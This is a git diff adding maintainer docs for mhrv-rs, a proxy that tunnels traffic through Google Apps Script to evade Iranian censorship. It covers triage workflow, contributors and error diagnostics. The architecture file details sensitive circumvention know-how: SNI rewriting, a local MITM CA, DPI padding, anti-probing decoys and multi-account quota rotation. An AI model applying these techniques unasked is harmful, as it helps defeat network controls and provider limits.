+Every changelog file in `docs/changelog/vX.Y.Z.md` follows this exact format:
+
+```markdown
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• [bullet 1 in Persian]
+• [bullet 2 in Persian]
+---
+• [same bullet 1 in English]
+• [same bullet 2 in English]
+```
+
+Persian comes first because the userbase is majority-Persian. The English version is for international contributors and the public repo audience. Both versions cover the same content but are written natively in each language — not machine-translated.
+
+### When to close issues
+
+Close immediately:
+- **Resolved** — user confirmed fix works (`gh issue close N --reason completed`)
+- **Duplicate** — point to canonical thread (`gh issue close N --reason "not planned"`)
+- **Architectural limit** — feature can't be implemented due to Apps Script restrictions (close with explanation, mark as `not planned`)
+
+Keep open:
+- **Tracking** — issue serves as canonical reference for a roadmap item (e.g., #313 for ISP throttle, #300 for SABR cliff, #420 for dual-VPS docs)
+- **Awaiting user verification** — a fix/workaround was posted, waiting for user to confirm
+- **Active diagnostic** — back-and-forth with user gathering data
+
+When closing as duplicate, always include the canonical issue number in the close comment so future readers can navigate.
+
+## DOPR (Daily Open PR + Issue Triage) cycle
+
+For "do DOPR", "check issues", "issues, prs", or similar requests, the workflow is:
+
+1. **List open PRs**: `gh pr list --state open --limit 20`
+2. **List recently-updated issues**: `gh issue list --state open --limit 30 --search "sort:updated-desc"`
+3. **For each PR**: review the diff, check CI, decide merge/comment/decline. New PRs from new accounts that look like supply-chain-pattern (typosquat, "update requirements.txt" with weird deps, rebrand-and-replace) get declined politely. Substantive code from known contributors generally gets merged after a local `cargo test --lib` + build. See `references/contributors.md` for who's known.
+4. **For each issue updated since last DOPR**: read the latest comments. If there's a new user message, reply substantively (not just "thanks, will look into it"). If there's user confirmation that a fix worked, close the issue. If you've been waiting on user data and they haven't responded for several days, the issue can stay open or be closed with "Closing for now; reopen if it's still happening." (use judgment).
+5. **If anything user-visible landed**: cut a patch release. Don't batch up 5 PRs into one big release — ship one at a time.
+6. **For each new substantive issue**: write a real reply. Default to writing it in a temp file (e.g., `/tmp/r-<issue>-<topic>.md`) and posting via `gh issue comment N --body-file ...` (avoids HEREDOC quoting hell with backticks and `$()`).
+
+DOPR replies should not be templated. Use the issue-patterns reference to recognize the situation, then write a reply that addresses _this user's specific report_ — their log lines, their config, their setup. Templated replies are easy to spot and erode trust.
+
+## Operational guardrails
+
+- **Don't merge PRs without local verification** — `git fetch && gh pr checkout N && cargo test --lib && cargo build --release`. CI doesn't run tests on PRs in this repo (release-drafter is the only automation that runs), so local verification is the real gate.
+- **Don't push to `main` while a release is mid-flight** — `release.yml` auto-fires on tag push and races with subsequent commits. Wait for the release CI to complete before merging more PRs.
+- **Don't skip the `--reason` flag on `gh issue close`** — `completed` for resolved, `not planned` for duplicates and architectural limits.
+- **Don't update `docs/changelog/` for already-released versions** — the file is the historical record of what shipped. New work goes into a new file for the next version.
+- **Don't share AUTH_KEYs, TUNNEL_AUTH_KEYs, or deployment IDs** that a user posted in an issue. They might think they obfuscated them, but if they didn't, don't quote them back. If you need to reference them, use `YOUR_AUTH_KEY` / `<deployment_id>` placeholders.
diff --git a/docs/maintainer/assets/changelog-template.md b/docs/maintainer/assets/changelog-template.md
new file mode 100644
index 00000000..e5f8ffd2
--- /dev/null
+++ b/docs/maintainer/assets/changelog-template.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• [توضیح bullet اول به فارسی، با link به issue/PR — مثال: ([#NNN](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/NNN), PR [#MMM](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/MMM) از @contributor)]: شرح آنچه تغییر کرده + چرا اهمیت داره. اطلاعات معماری مرتبط، مقادیر default، و escape hatch‌ها برای کاربرانی که می‌خواهن behavior قدیم رو نگه دارن
+• [bullet دوم — همین structure: تغییر + چرا + escape hatch]
+• [اگر breaking change وجود داره: **شکستگی سازگاری**: شرح breaking + migration steps]
+---
+• [bullet 1 in English ([#NNN](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/NNN), PR [#MMM](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/MMM) by @contributor): description of what changed and why it matters. Architectural context, default values, and escape hatch for users who want to preserve old behavior]
+• [bullet 2 in English with the same structure: change + why + escape hatch]
+• [if breaking change: **Breaking change**: description + migration steps]
diff --git a/docs/maintainer/assets/reply-marker.md b/docs/maintainer/assets/reply-marker.md
new file mode 100644
index 00000000..37d98b40
--- /dev/null
+++ b/docs/maintainer/assets/reply-marker.md
@@ -0,0 +1,2 @@
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
diff --git a/docs/maintainer/references/architecture.md b/docs/maintainer/references/architecture.md
new file mode 100644
index 00000000..476b01df
--- /dev/null
+++ b/docs/maintainer/references/architecture.md
@@ -0,0 +1,122 @@
+# Architecture
+
+## What mhrv-rs is
+
+mhrv-rs is the Rust port of [`masterking32/MasterHttpRelayVPN`](https://github.com/masterking32/MasterHttpRelayVPN) (Python). It's an HTTP proxy that runs locally on the user's machine (Windows / macOS / Linux / Android, with OpenWRT and Raspbian builds for sidecars) and bridges browser/app traffic out through Google Apps Script.
+
+The architectural unlock: from the user's ISP perspective, all traffic looks like normal HTTPS to a Google IP. ISPs that censor by SNI / domain / TLS-fingerprint can't block the relay without breaking Google access for their entire customer base. ISPs that censor by destination IP can't block it either, because the destinations are Google data centers.
+
+Apps Script's `UrlFetchApp.fetch()` is the workhorse — it's a Google-blessed API for outbound HTTPS, and Google effectively runs an open proxy to the rest of the internet on every Apps Script user's behalf.
+
+## Two operating modes
+
+### apps_script mode (default)
+
+```
+client app → mhrv-rs HTTP/SOCKS5 listener →
+  MITM (intercepts HTTPS, signs with local CA) →
+  POST batch to Apps Script Web App →
+  Apps Script's UrlFetchApp.fetch() → upstream destination →
+  Apps Script returns body → mhrv-rs returns to client
+```
+
+- **Code.gs** (in `assets/apps_script/Code.gs`) is the script the user deploys to their own Google account at `script.google.com`. Each deployment gets a `script_id` like `AKfycbz1abc...`.
+- The MITM layer signs HTTPS leaf certs on the fly using a CA installed in the user's trust store. This lets mhrv-rs read the plaintext request, batch it through Apps Script, and return the response to the client.
+- All upstream protocols are HTTP/HTTPS. **No UDP, no MTProto, no QUIC, no WebRTC.** Apps Script can't carry them.
+- Per-Apps-Script-account quota: ~20,000 UrlFetchApp calls/day, 30 concurrent, 6-min per-invocation cap, 30s soft response cliff.
+
+### Full mode
+
+```
+client app → mhrv-rs SOCKS5 →
+  signal/control via Apps Script (small JSON RPC) →
+  Apps Script calls into tunnel-node container on user's VPS →
+  tunnel-node opens TCP socket to upstream →
+  bytes flow through tunnel-node ↔ Apps Script ↔ mhrv-rs ↔ client
+```
+
+- **CodeFull.gs** (in `assets/apps_script/CodeFull.gs`) is a different Apps Script — replaces Code.gs's local-fetch with calls to a tunnel-node container.
+- **tunnel-node** is a small axum-based Rust HTTP server (in `tunnel-node/`) that the user runs on their own VPS via Docker. Image: `ghcr.io/therealaleph/mhrv-tunnel-node:latest`.
+- The bytes flow through the actual TCP tunnel between tunnel-node and the upstream server — Apps Script only handles the **signaling** for tunnel session lifecycle. This means Apps Script's 30s response cap doesn't apply to long-running connections (no SABR cliff). Bigger uploads/downloads work.
+- Trade-off: requires a VPS ($3-5/month from Hetzner/Contabo/OVH/Parspack), more setup steps, three places to keep AUTH_KEYs in sync.
+- The VPS does NOT need to be reachable from Iran directly. Apps Script (running in Google's data center) is the one that talks to the VPS, so the user's ISP only sees the user-to-Apps-Script leg, which is Google IPs.
+
+## The three secrets
+
+These are a constant source of user confusion. Get the names right:
+
+| Secret | Lives where | Must match | Notes |
+|--------|-------------|------------|-------|
+| `AUTH_KEY` (or `auth_key` in mhrv-rs config.json) | mhrv-rs `config.json` ↔ `Code.gs`/`CodeFull.gs` | Both ends | Per-deployment user secret; protects against random people hitting the user's deployment URL. Editing it in Code.gs without **redeploying as a new version** in Apps Script is the single most common user mistake. |
+| `TUNNEL_AUTH_KEY` | `CodeFull.gs` ↔ tunnel-node container env var | Both ends | Full mode only. Env var name is **literally `TUNNEL_AUTH_KEY`** — uppercase, with underscores, exact string. Several users have written `MHRV_AUTH_KEY` (wrong) or `Tunnel` (wrong); the env var is case-sensitive in Linux/Docker and any deviation falls back to the default `changeme`. |
+| `DIAGNOSTIC_MODE` | `Code.gs` and `CodeFull.gs` (constant at top) | n/a — local toggle | When `false` (default), the script returns a benign HTML decoy (`"The script completed but did not return anything"`) for bad-auth requests, mimicking Apps Script's own placeholder. When `true`, returns explicit JSON `{"e":"unauthorized"}`. The decoy mode is anti-active-probing defense (#357 pattern); diagnostic mode is for setup. |
+
+## Apps Script's hidden constraints
+
+These are constraints Google enforces on Apps Script's `UrlFetchApp.fetch()` that shape what mhrv-rs can and can't do:
+
+1. **Self-loop restriction** — `UrlFetchApp.fetch()` blocks calls to `*.google.com`, `*.googleapis.com`, `*.gstatic.com`, `*.googleusercontent.com`. **Google services are unreachable through apps_script mode by design.** This includes `gmail.com`, `meet.google.com`, `colab.research.google.com`, `drive.google.com`, and `script.google.com` itself (ironic — you can't proxy your way to managing your own deployment). Workaround for users with a VPS: dual-routing in xray (route Google direct from the VPS, everything else through mhrv-rs). Without a VPS there is no workaround — point users at #420.
+2. **30-second response cliff** — Apps Script Web Apps have a soft cap of 30s on the response. Long downloads or video streams (YouTube SABR, large file downloads >50 MB through MITM) get truncated. Tracked as #300 (SABR cliff). v1.9.0 xmux roadmap aims to mitigate by splitting across deployments.
+3. **6-minute per-invocation cap** — hard limit. After this, `UrlFetchApp.fetch()` throws and Apps Script kills the request.
+4. **30 concurrent executions per Apps Script account** — affects users who put the same `script_id` under heavy load. Lower `parallel_concurrency` in mhrv-rs config to avoid hitting this.
+5. **Daily quota: 20,000 UrlFetchApp calls per Google account** — resets at 00:00 UTC. Multi-deployment rotation across multiple Google accounts is the workaround.
+6. **Per-100s rolling soft quota** — undocumented but consistently observed. When tripped, returns the placeholder body (one of the 6 candidate causes for the placeholder; see `diagnostic-taxonomy.md`).
+7. **Localized error pages** — Apps Script returns its placeholder body in the locale of the deploying account or origin IP. For Iranian users, this means a Persian HTML page. v1.8.3 detection now distinguishes this case.
+
+## The MITM CA
+
+To intercept HTTPS in apps_script mode, mhrv-rs runs a per-machine CA:
+
+- Generated on first run, stored at `<data_dir>/ca/ca.crt` and `ca.key`.
+- Installed into the user's OS trust store via the `cert_installer` module.
+- On Windows: user-trust store via `certutil -addstore`.
+- On macOS: login keychain via `security`.
+- On Linux: distro-specific (NSS for Firefox, system bundle for Chrome/curl).
+- **On Android**: only the **user trust store**, not system. Most apps (YouTube, Gmail, Telegram, Instagram, banking) only trust the system store, so they don't see mhrv-rs. Chrome/Firefox/Edge browsers explicitly opt in to user trust and DO use mhrv-rs. This is the Android user-trust-store gotcha that drives much of the Android UX confusion. Workaround for power users: root + Magisk + MagiskTrustUserCerts module migrates user CA to system.
+
+The `--remove-cert` CLI flag tears down the CA cleanly (uninstall from trust store + delete files). PR #121 from `dazzling-no-more` added this; lives in `src/main.rs` `remove_cert` flow.
+
+## SNI rewriting + google_ip rotation
+
+Each connection from mhrv-rs to Apps Script is set up in three layers:
+
+- **TCP connect** to `google_ip` (default `216.239.38.120` — a Google edge IP)
+- **TLS SNI** = `www.google.com` (rewritten — this is what the ISP sees in cleartext)
+- **HTTP Host header** = `script.google.com` (the real destination, hidden inside the encrypted tunnel)
+
+Iran ISPs occasionally filter specific Google IPs (#313 pattern). When this happens, the user can rotate `google_ip` to another IP from `DEFAULT_GOOGLE_SNI_POOL` (the 12-entry list in `src/domain_fronter.rs`). `mhrv-rs scan-ips` is a diagnostic command that probes Google IPs from the user's network and reports which ones complete TLS handshakes.
+
+`scan_config.json` (separate from main `config.json`) is the input for `mhrv-rs scan-ips` — users sometimes confuse the two and put the scan config where the main config should be. See `issue-patterns.md`.
+
+## v1.8.0 anti-fingerprinting features
+
+- **Random padding** (`_pad` field, 0-1024 bytes uniform random, base64) — defeats DPI length-distribution fingerprinting. Users on heavily-throttled ISPs can disable it with `disable_padding: true` (~25% bandwidth savings); this opt-out landed in v1.8.1.
+- **Auto-blacklist deployments** that timeout repeatedly (#319) — round-robin pool actively excludes failing deployments for a cooldown period. Tunable strike threshold queued for v1.8.x.
+- **Decoy responses** for bad-auth requests — see `DIAGNOSTIC_MODE` above.
+- **Active-probing defense** — random benign body on `doGet` requests so a probe to the deployment URL doesn't reveal that it's a relay.
+
+## v1.8.3 features (just shipped)
+
+- **DoH bypass** — DNS-over-HTTPS to Cloudflare/Google/Quad9/AdGuard/etc. routes around the Apps Script tunnel via plain TCP/443. Saves ~2s per DNS lookup. The bypass is on by default; to opt out (i.e. send DoH through the tunnel again), set `tunnel_doh: true`.
+- **H1 container keepalive** — 240s ping to prevent Apps Script V8 cold-start stalls. Visible win for YouTube playback after pause.
+- **64 KB header cap with HTTP 431** — replaces silent socket drops that caused browser retry loops on oversized headers.
+- **Spreadsheet-backed response cache** in Code.gs (opt-in via `CACHE_SPREADSHEET_ID`) — TTL-aware, Vary-aware, circular-buffer for O(1) writes. Reduces UrlFetchApp quota consumption.
+
+## Key files in the repo
+
+- `src/main.rs` — CLI binary entry point. `init_logging()` reads `config.log_level`. `Cmd::Test`, `Cmd::ScanIps`, etc. as subcommands.
+- `src/bin/ui.rs` — UI binary entry (Windows + Android via JNI). Shares lib code via `mhrv_rs::*`. The `install_ui_tracing` function (post-v1.8.2) reads `RUST_LOG > config.log_level > info,hyper=warn`.
+- `src/lib.rs` — re-exports for the lib + Android JNI shim.
+- `src/domain_fronter.rs` — the SNI-rewrite TLS dialer + the `DomainFronter` orchestrator. `DEFAULT_GOOGLE_SNI_POOL` lives here.
+- `src/proxy_server.rs` — HTTP/SOCKS5 listeners, dispatch logic, DoH bypass, MITM mode entry.
+- `src/tunnel_client.rs` — Full mode batch client. Decoy detection + script_id-in-logs added v1.8.1; softer 6-cause message v1.8.3.
+- `src/mitm/` — MITM cert manager.
+- `src/cert_installer/` — per-OS trust store installation logic.
+- `src/config.rs` — `Config` struct + JSON serde. Default values, validation.
+- `assets/apps_script/Code.gs` and `CodeFull.gs` — server-side scripts. Edit these and tell users to redeploy as new version in Apps Script.
+- `tunnel-node/` — separate Rust crate for the Full-mode VPS container. README + README.fa.md (Persian translation).
+- `android/app/src/main/java/com/therealaleph/mhrv/` — Android Kotlin glue. `MhrvVpnService.kt` is the VPNService that calls into Rust via JNI. `ConfigStore.kt` is the form/preferences round-trip.
+- `docs/changelog/` — versioned changelog files. Format: Persian, then `---`, then English.
+- `.github/workflows/release.yml` — release CI: builds for all platforms, attaches to GitHub release.
+- `.github/workflows/telegram-publish-files.yml` — fires on `workflow_run` of release.yml; posts each file individually to the Telegram channel `-1003966234444` with Persian captions, SHA-256 in caption, and a cross-link from the main channel.
+- `.github/scripts/telegram_publish_files.py` — stdlib-only Python script that does the actual Telegram posting (no `requests` dep so it works in minimal CI runners).
diff --git a/docs/maintainer/references/contributors.md b/docs/maintainer/references/contributors.md
new file mode 100644
index 00000000..1330fd5f
--- /dev/null
+++ b/docs/maintainer/references/contributors.md
@@ -0,0 +1,126 @@
+# Contributor ecosystem
+
+The project's substantive contributors fall into a few specialty domains. Knowing who-does-what lets you tag the right reviewer, weight feedback appropriately, and route new design decisions to the people most likely to have informed opinions.
+
+## Project owner
+
+### @therealaleph
+
+Maintainer. Final authority on architectural decisions, release timing, what merges. Persian/English bilingual. Replies that go through Claude carry the marker `[reply via Anthropic Claude | reviewed by @therealaleph]` and are reviewed before posting.
+
+## Core community contributors
+
+These are the contributors whose substantive PRs and reports have shaped the project's roadmap. When designing features that touch their domain, tag them for review.
+
+### @w0l4i
+
+**Domain**: deep diagnostic feedback, architectural insight, persistence on hard bugs.
+
+**Notable contributions**:
+- Drove the v1.8.1 → v1.8.2 → v1.8.3 evolution of decoy detection. Reported the false-positive in v1.8.1 that led to the 4-cause taxonomy (then 5-cause, then 6-cause).
+- Reported the Persian-localized quota body case (#404) after multiple iterations through wrong hypotheses (third-party relay → Iranian VPS appliance → Hetzner DE → Apps Script account locale).
+- Suggested the v1.8.x "per-deployment auto-throttle" feature (AIMD style) with detailed rationale.
+- Suggested the v1.9.0 xmux roadmap items: byte-range slipstreaming across deployments, MTU/packet-size optimization, per-deployment burst limits.
+- Drove the v1.8.x DNS architecture redesign by pointing out that Iranian DNS providers (Shecan, 403) perform DNS hijacking and poisoning — they cannot be trusted as privacy-preserving alternatives (see #449).
+
+**How to engage**:
+- Reports are detailed and self-correct fast as data comes in
+- Setups tend to be advanced (multiple deployments, Hetzner VPS, Full mode)
+- Tag as a core reviewer for v1.9.0 xmux design issue when filed
+- Communication: English
+
+### @2bemoji
+
+**Domain**: roadmap design discussions, particularly for QUIC blocking and DNS optimization.
+
+**Notable contributions**:
+- Drove the design of `block_quic` 3-state UI toggle (off / drop / reject with ICMP unreachable for instant Happy Eyeballs failover) in #361 / #377
+- Surfaced the mobile-accessibility framing for `block_quic` (config-only is "Linux desktop only" for users who can't easily edit Android's `/data/data/...` config)
+
+**How to engage**:
+- Tag for Android UI batch decisions, especially anything touching QUIC / DNS / network-layer toggles
+- Tag for v1.9.0 xmux design as a core reviewer
+- Communication: English
+
+### @ipvsami / Sam Ashouri
+
+**Domain**: advanced Full mode setups, dual-VPS topologies, account suspension reports.
+
+**Notable contributions**:
+- Reported the Iranian-VPS xray entry topology in #420 (Iranian VPS as xray entry, German VPS as tunnel-node exit) — drove the dual-routing-xray design discussion
+- Reported the Google account flag pattern in #421 (phone-less new accounts, "action required" notifications, Workspace landing HTML on flagged deployments) — drove the v1.8.x detection for the 6th cause in the diagnostic taxonomy
+
+**How to engage**:
+- Comfortable with VPS / xray / network routing; explanations can assume that level
+- Tag for v1.9.0 xmux design as a core reviewer
+- Communication: English
+
+### @dazzling-no-more
+
+**Domain**: code contributor — substantive Rust PRs.
+
+**Notable contributions**:
+- PR #121 (`--remove-cert` flag for clean CA teardown)
+- PR #359 (Google Drive queue tunnel mode — community-testing, awaiting cleanup confirmation)
+- PR #438 (H1 container keepalive + 431 oversized headers + clearer port-collision message — merged in v1.8.3)
+- PR #439 (DoH bypass for Cloudflare/Google/Quad9/etc. on TCP/443 — merged in v1.8.3)
+- PR #446 (tunnel-node long-poll raised to 15s, adaptive straggler settle — merged in v1.8.4)
+
+**How to engage**:
+- PRs tend to be self-contained with tests and clean diffs
+- Address review feedback substantively — they iterate based on reviewer comments
+- Tag for v1.9.0 xmux design as a core reviewer (could potentially contribute the implementation)
+- Communication: English
+
+### @euvel
+
+**Domain**: code contributor — Apps Script (Code.gs) features.
+
+**Notable contributions**:
+- Designed the spreadsheet-backed response cache (#400 design discussion → PR #443 implementation)
+- All 5 review suggestions from the design discussion implemented in PR #443: TTL-aware caching, 35 KB body-size gate, header rewriting on hit, circular buffer for O(1) writes, Vary-aware compound cache keys
+
+**How to engage**:
+- Apps Script JavaScript expertise; consider tagging for any future Code.gs changes
+- Communication: English
+
+## Adjacent projects
+
+### @masterking32
+
+Original Python project (`masterking32/MasterHttpRelayVPN`). mhrv-rs is the Rust port; the project periodically cherry-picks stability/feature commits from masterking32. PR #438 in v1.8.3 was a batch of three such cherry-picks. Not a direct contributor here, but the project's design parent.
+
+### @denuitt1
+
+Maintainer of `denuitt1/mhr-cfw` — Cloudflare Workers backend that aims to be Apps Script-compatible. Independent project, not officially endorsed. Tracked in #380 / #393 for compatibility audit. Not a direct contributor here.
+
+### @g3ntrix, @mehrad-mz
+
+Authors of forks/branches on the Python project that occasionally have valuable commits to cherry-pick (see #430 for the audit list).
+
+## Tagging conventions
+
+When tagging in a comment:
+
+- Reviewer requests: "@dazzling-no-more — would you mind reviewing this approach?"
+- Cross-references: "see [#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404) where @w0l4i described this"
+- Recognition: "this drove the design — thanks @euvel for the detailed initial proposal"
+- For v1.9.0 xmux design issue specifically (when it's filed): tag @w0l4i, @2bemoji, @ipvsami, @dazzling-no-more, @euvel as core reviewers
+
+Don't ping people gratuitously; each ping should have a clear ask or recognition.
+
+## Project history context
+
+The project predates this repo as `masterking32/MasterHttpRelayVPN` (Python). The Rust port was started for performance + cross-platform binary distribution. Apps Script protocol stayed compatible across both, and we periodically cherry-pick from upstream Python. v1.7.x represented the initial port stabilization; v1.8.x is the "DPI evasion + diagnostics + community-contribution batch"; v1.9.0 will be the xmux flagship.
+
+Canonical "long" issues for context:
+- #313 — Iran ISP throttle, primary tracking issue
+- #300 — SABR cliff, primary tracking for video streaming limit
+- #310 — VPS setup help, primary tracking for setup questions
+- #333 — VPS / Full mode / Iranian-network workarounds
+- #420 — dual-VPS topology, primary tracking for advanced Full mode
+- #382 — Cloudflare error patterns
+- #325 — community-shared deployment workflow
+- #361 / #377 — Android UI batch + QUIC blocking design
+- #369 — v1.9.0 xmux design (RFC, not yet filed as the formal design issue)
+- #449 — DNS architecture redesign (post-Shecan correction)
diff --git a/docs/maintainer/references/diagnostic-taxonomy.md b/docs/maintainer/references/diagnostic-taxonomy.md
new file mode 100644
index 00000000..35b8b6f8
--- /dev/null
+++ b/docs/maintainer/references/diagnostic-taxonomy.md
@@ -0,0 +1,161 @@
+# Diagnostic taxonomy: the placeholder body
+
+## What this is
+
+Multiple distinct conditions cause Apps Script (or our own scripts on Apps Script) to return an HTML body that mhrv-rs's batch parser sees as `bad response: no json in batch response: <body prefix>`. Through user reports and iteration we've narrowed the body strings to **6 candidate causes**. Distinguishing them requires both client-side detection (string-match on body content) and server-side disambiguation (`DIAGNOSTIC_MODE` flag in Code.gs).
+
+This taxonomy is the post-mortem evolution of v1.8.0 → v1.8.1 → v1.8.2 → v1.8.3 detection. v1.8.1 falsely asserted "AUTH_KEY mismatch" on body match; v1.8.2 softened to enumerate 4 candidates; v1.8.3 added the Persian-localized cause and the Workspace landing HTML cause for account-flagged deployments — bringing the count to 6.
+
+## The 6 candidate causes
+
+### 1. AUTH_KEY mismatch (intentional decoy)
+
+**Body**:
+```html
+<!DOCTYPE html>
+<html>
+<head><title>Web App</title></head>
+<body><p>The script completed but did not return anything.</p></body>
+</html>
+```
+
+**Source**: Our `Code.gs` / `CodeFull.gs` returns this when `request.k !== AUTH_KEY` and `DIAGNOSTIC_MODE = false`. It mimics Apps Script's stock placeholder for empty-return scripts.
+
+**Trigger**: User edited AUTH_KEY in Apps Script editor but didn't redeploy as new version, OR user has different AUTH_KEY in `config.json` than in `Code.gs`, OR user is using Code.gs deployment ID with `mode: full` (which expects CodeFull.gs).
+
+**Disambiguator**: Set `DIAGNOSTIC_MODE = true` in Code.gs / CodeFull.gs + redeploy as new version. Then this case returns `{"e":"unauthorized"}` (explicit JSON) instead of the HTML. The other 5 cases are independent of DIAGNOSTIC_MODE and still return their natural body.
+
+**Fix**: Align AUTH_KEY values + redeploy as new version.
+
+### 2. Apps Script execution timeout
+
+**Body**: same `"The script completed but did not return anything"` HTML, but emitted by Apps Script itself (not our script) when the execution exceeded the per-invocation cap.
+
+**Source**: Apps Script's runtime kills the script after 6-min hard cap or 30s soft cap on Web App responses, then serves the placeholder body.
+
+**Trigger**: Slow upstream destination, large response payload, network stall mid-fetch.
+
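+**Disambiguator**: With `DIAGNOSTIC_MODE = true`, AUTH_KEY mismatch (cause 1) returns explicit JSON instead of the placeholder; if the placeholder body still appears for some batches, it's likely cause 2, 3, or 4 (causes 5 and 6 present with their own Persian HTML bodies rather than the placeholder).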
+
+**Fix**: Lower `parallel_concurrency` in `config.json`, retry, accept some intermittent failures.
+
+### 3. Apps Script soft-quota tear
+
+**Body**: same placeholder HTML. Sometimes a different short HTML page mentioning Apps Script's quota system.
+
+**Source**: Apps Script's per-100s rolling soft quota or per-account daily quota hit. Apps Script kills the request mid-execution.
+
+**Trigger**: Account-aggregate UrlFetchApp throughput exceeded per-100s threshold (~30 concurrent or so). Common with multi-device single-deployment users during page load events (browsers fire 50+ requests in a burst).
+
+**Disambiguator**: Same as 2 — DIAGNOSTIC_MODE rules out AUTH_KEY but doesn't distinguish 2 from 3 from 4. Check the per-script_id error rate over a few minutes — if a deployment has 30%+ failure rate during peak browser activity but works fine when idle, it's quota-related (3 or possibly 5).
+
+**Fix**: Lower `parallel_concurrency`, add more deployments to `script_ids` rotation, distribute deployments across multiple Google accounts.
+
+### 4. Iran ISP-side response truncation
+
+**Body**: typically truncated mid-stream — the body that arrives at mhrv-rs is missing the trailing JSON envelope. The early bytes look like a valid Apps Script response prefix but the request was cut by an ISP-side TCP RST mid-flight.
+
+**Source**: Iran's ISP infrastructure (especially TCI/مخابرات) actively RST-injects on TLS connections to specific Google IPs (the #313 pattern).
+
+**Trigger**: Network-conditional. Active throttle periods (sometimes hours, sometimes days). Worse on certain Google IPs. Worse on certain Iranian ISPs.
+
+**Disambiguator**: Direct curl test from the user's network (see `issue-patterns.md` Pattern 3). If curl-to-Apps-Script also gets timeouts/RST, confirmed ISP-side. The HTML body in this case is partial/truncated — sometimes just `<!DOCT...` rather than the full placeholder.
+
+**Fix**: Workarounds in Pattern 3 — `disable_padding`, rotate `google_ip`, switch network, multi-deployment, Full mode + VPS.
+
+### 5. Apps Script Persian-localized soft-quota body
+
+**Body**:
+```html
+<html lang="fa" dir="rtl">
+<head>
+  <meta name="description" content="پردازش کلمه وب، ارائه‌ها و صفحات گسترده">
+  ...
+```
+
+May also include phrases like `از سهمیه پهنای باند مجاز فراتر رفته‌اید` ("you exceeded the allowed bandwidth quota") and `مقدار انتقال داده را کمتر کنید` ("reduce data transfer volume").
+
+**Source**: Apps Script itself. Apps Script localizes its system error pages based on the deploying Google account's locale (fa-IR for Persian) and/or the request-origin IP.
+
+**Trigger**: Account is Persian-locale (common for Iranian users) AND the request either hit a quota threshold (cause 3) or ran into an internal Google-side hiccup.
+
+**Disambiguator**: With `DIAGNOSTIC_MODE = true`, cause 1 returns explicit JSON; if Persian HTML still appears, it's not our script — it's Apps Script's own response.
+
+**Important**: w0l4i's case in #404 traced through several wrong hypotheses before landing here:
+- Initially diagnosed as AUTH_KEY mismatch → no, mixed success/failure on same `script_id`
+- Then diagnosed as third-party relay (`g.workstream.ir` looks Iranian) → no, w0l4i clarified it's his own tunnel
+- Then diagnosed as Iranian VPS provider appliance → no, Hetzner Nuremberg
+- Final landing: Apps Script's own Persian-localized quota response based on Google account locale
+
+This iteration is documented because the false starts are instructive — don't lock in on the first hypothesis.
+
+**Fix**: Same as cause 3 (it's a quota issue presenting as Persian HTML).
+
+### 6. Workspace landing HTML for account-flagged deployments
+
+**Body**:
+```html
+<html lang="fa" dir="rtl">
+<head>
+  <meta name="description" content="پردازش کلمه وب، ارائه‌ها و صفحات گسترده"...
+  <title>...</title>
+```
+
+The body is Google Workspace's landing page (the Persian description translates to "Web word processing, presentations, and spreadsheets", the standard tagline for Google Docs/Sheets/Slides). It's served by Apps Script when the deployment owner's Google account is in a flagged state (post-warning, pre-suspension).
+
+**Source**: Apps Script refuses to execute the deployed script when the owning account is restricted, and serves the Workspace landing page as a "log in" prompt instead.
+
+**Trigger**: Account is in stage 1b or stage 2 of the suspension progression (see `issue-patterns.md` Pattern 8). Often correlates with phone-less new accounts that ignored the "action required" prompt.
+
+**Disambiguator**: Owner of the deployment can log in to Google → see if there are pending warnings or restrictions. If yes → fix the account (add phone) or rotate the deployment to a healthier account.
+
+**Fix**: Account-side, not config-side. Add phone verification, OR move to a different deployment owner via #325 workflow.
+
+## v1.8.3 detection logic
+
+```rust
+// In src/tunnel_client.rs around line 893+
+if err_msg.contains("The script completed but did not return anything") {
+    tracing::error!(
+        "batch failed (script {}): got the v1.8.0 decoy/placeholder body — \
+         could be (1) AUTH_KEY mismatch (run a direct curl probe against \
+         the deployment to verify), (2) Apps Script execution timeout or \
+         per-100s quota tear (try lowering parallel_concurrency), \
+         (3) Apps Script internal hiccup (transient, retry next batch), \
+         or (4) ISP-side response truncation (#313 pattern, try a \
+         different google_ip). To distinguish (1) from the rest: set \
+         DIAGNOSTIC_MODE=true at the top of Code.gs + redeploy as new \
+         version — only AUTH_KEY mismatch returns this body in diagnostic \
+         mode.",
+        sid_short
+    );
+}
+```
+
+The snippet above shows the v1.8.2 string, which is why its message enumerates only four causes. v1.8.3 adds detection for the Persian quota body and the Workspace landing HTML as separate paths.
+
+## When responding to users showing this log
+
+The right response shape is:
+
+1. **Acknowledge** the log line they pasted
+2. **Enumerate** the 6 (or 4-5 in older versions) candidate causes briefly
+3. **Identify the most likely** for their specific case using context clues:
+   - Single-deployment user, fresh setup → likely cause 1 (AUTH_KEY)
+   - Mixed success/failure on same script_id → NOT cause 1 (AUTH_KEY would fail 100%)
+   - "Worked yesterday, broken today" → likely cause 4 (ISP throttle) or cause 6 (account flag in progression — see `issue-patterns.md` Pattern 8)
+   - High concurrency / many devices on one deployment → likely cause 3 (quota) or cause 5 (Persian quota variant)
+   - Persian HTML body → cause 5 or 6
+   - Hetzner/Iranian VPS Full-mode user → check if VPS is actually Iranian (provider appliance is real for Iranian VPS only)
+4. **Give the disambiguator**: DIAGNOSTIC_MODE flip + redeploy
+5. **Give the immediate workaround** appropriate to the most-likely cause
+
+Don't claim certainty before disambiguator data. v1.8.1 over-asserted; v1.8.3 explicitly enumerates because we learned to.
+
+## What v1.8.x roadmap is doing about this
+
+- **Per-script_id error-category counter** — surface in CLI/UI: "deployment AKfycbz1: 95% success, 4% timeout, 1% quota, 0% auth_mismatch over last 5 min". Lets users diagnose without flipping DIAGNOSTIC_MODE.
+- **Distinct error categories in client logs** — separate AUTH_KEY mismatch / timeout / quota / ISP truncation / Persian quota / Workspace landing into 6 distinct error log lines. Currently these are lumped together rather than logged as separate categories.
